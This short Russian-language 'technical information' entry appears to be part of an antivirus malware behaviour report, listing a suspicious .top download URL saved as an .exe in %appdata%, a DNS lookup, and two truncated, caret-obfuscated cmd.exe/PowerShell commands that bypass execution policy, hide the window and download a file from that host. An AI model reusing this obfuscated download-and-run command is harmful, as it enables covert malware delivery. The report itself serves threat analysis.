Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^eRsheLL.^eXe^ ^-Ex^ec^u^tI^O^N^p^olI^C^Y bYp^aS^s -nOpROfILE^ -^W^In^doWST^yLE ^hId^de^n^ (^nEW-oBJ^ecT^ s^YsTe^m^.N^ET^.we^bCl^i^e^NT^)^.^DOwNLO^adfiLE^(^'http://zussipussicsc...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /C "Pow^eRsheLL.^eXe^ ^-Ex^ec^u^tI^O^N^p^olI^C^Y bYp^aS^s -nOpROfILE^ -^W^In^doWST^yLE ^hId^de^n^ (^nEW-oBJ^ecT^ s^YsTe^m^.N^ET^.we^bCl^i^e^NT^)^.^DOwNLO^adfiLE^(^'http://zussipussicsc...' (со скрытым окном)